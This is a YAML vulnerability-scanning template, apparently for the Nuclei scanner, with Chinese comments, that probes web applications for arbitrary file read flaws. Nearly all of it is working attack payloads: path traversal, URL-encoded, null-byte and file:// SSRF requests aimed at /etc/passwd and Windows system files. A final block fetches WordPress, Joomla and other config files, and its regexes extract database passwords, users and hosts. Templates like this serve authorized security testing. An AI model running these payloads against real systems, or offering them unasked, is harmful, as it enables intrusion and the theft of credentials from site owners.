id: generic-file-read

info:
  name: 通用任意文件读取漏洞检测
  author: 如烟
  severity: high
  description: |
    通用任意文件读取漏洞检测POC，支持多种常见文件读取场景。
    包括路径遍历、文件包含、SSRF导致的文件读取等。
  reference:
    - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04.2-Testing_for_Path_Traversal
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: file-read,path-traversal,ssrf,high

variables:
  filename: "{{rand_base(6)}}"

# Linux系统文件读取测试
http:
  # 基础路径遍历测试
  - method: GET
    path:
      - "{{BaseURL}}/download?file=../../../../etc/passwd"
      - "{{BaseURL}}/view?path=../../../../etc/passwd"
      - "{{BaseURL}}/file?name=../../../../etc/passwd"
      - "{{BaseURL}}/include?file=../../../../etc/passwd"
      - "{{BaseURL}}/page=../../../../etc/passwd"
      - "{{BaseURL}}/document?file=../../../../etc/passwd"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
      Accept: "*/*"

    matchers:
      - type: word
        words:
          - "root:x:0:0"
          - "bin:x:1:1"
          - "daemon:x:2:2"
          - "nobody:x:65534"
        condition: or

    extractors:
      - type: regex
        regex:
          - "root:x:0:0:root:[^:]*:[^:]*"
          - "bin:x:1:1:bin:[^:]*:[^:]*"

  # URL编码绕过测试
  - method: GET
    path:
      - "{{BaseURL}}/download?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd"
      - "{{BaseURL}}/view?path=..%252F..%252F..%252F..%252Fetc%252Fpasswd"
      - "{{BaseURL}}/file?name=..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    matchers:
      - type: word
        words:
          - "root:x:0:0"
        condition: and

  # Null字节绕过测试
  - method: GET
    path:
      - "{{BaseURL}}/download?file=../../../../etc/passwd%00"
      - "{{BaseURL}}/view?path=../../../../etc/passwd%00.jpg"
      - "{{BaseURL}}/file?name=../../../../etc/passwd%00.txt"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    matchers:
      - type: word
        words:
          - "root:x:0:0"
        condition: and

  # Windows系统文件读取测试
  - method: GET
    path:
      - "{{BaseURL}}/download?file=..\\..\\..\\..\\windows\\win.ini"
      - "{{BaseURL}}/view?path=..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts"
      - "{{BaseURL}}/file?name=..\\..\\..\\..\\boot.ini"
      - "{{BaseURL}}/include?file=..\\..\\..\\..\\windows\\win.ini"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    matchers:
      - type: word
        words:
          - "[fonts]"
          - "[extensions]"
          - "[files]"
          - "for 16-bit app support"
        condition: or

    extractors:
      - type: regex
        regex:
          - '\[fonts\]'
          - '\[extensions\]'
          - '\[files\]'

  # SSRF文件读取测试
  - method: GET
    path:
      - "{{BaseURL}}/proxy?url=file:///etc/passwd"
      - "{{BaseURL}}/fetch?url=file:///etc/passwd"
      - "{{BaseURL}}/redirect?to=file:///etc/passwd"
      - "{{BaseURL}}/load?url=file:///etc/passwd"
      - "{{BaseURL}}/api/external?url=file:///etc/passwd"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    matchers:
      - type: word
        words:
          - "root:x:0:0"
          - "bin:x:1:1"
        condition: or

  # POST请求文件读取测试
  - method: POST
    path:
      - "{{BaseURL}}/upload"
      - "{{BaseURL}}/process"
      - "{{BaseURL}}/generate"

    headers:
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    body: |
      file=../../../../etc/passwd
      path=../../../../etc/passwd
      document=../../../../etc/passwd

    matchers:
      - type: word
        words:
          - "root:x:0:0"
        condition: and

  # JSON格式文件读取测试
  - method: POST
    path:
      - "{{BaseURL}}/api/file"
      - "{{BaseURL}}/api/document"
      - "{{BaseURL}}/api/content"

    headers:
      Content-Type: application/json
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    body: |
      {
        "file": "../../../../etc/passwd",
        "path": "../../../../etc/passwd",
        "action": "read"
      }

    matchers:
      - type: word
        words:
          - "root:x:0:0"
        condition: and

  # 常见Web应用文件读取测试
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/vulnerable-plugin/file.php?path=../../../../wp-config.php"
      - "{{BaseURL}}/joomla/components/com_content/views/article/tmpl/default.php?file=../../../../configuration.php"
      - "{{BaseURL}}/drupal/sites/default/files/private/config.php"
      - "{{BaseURL}}/config/database.php"
      - "{{BaseURL}}/application/config/database.php"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    matchers:
      - type: word
        words:
          - "DB_PASSWORD"
          - "database"
          - "mysql"
          - "DB_HOST"
          - "DB_USER"
        condition: or

    extractors:
      - type: regex
        regex:
          - "define\\('DB_PASSWORD', '[^']*'\\)"
          - "define\\('DB_USER', '[^']*'\\)"
          - "define\\('DB_HOST', '[^']*'\\)"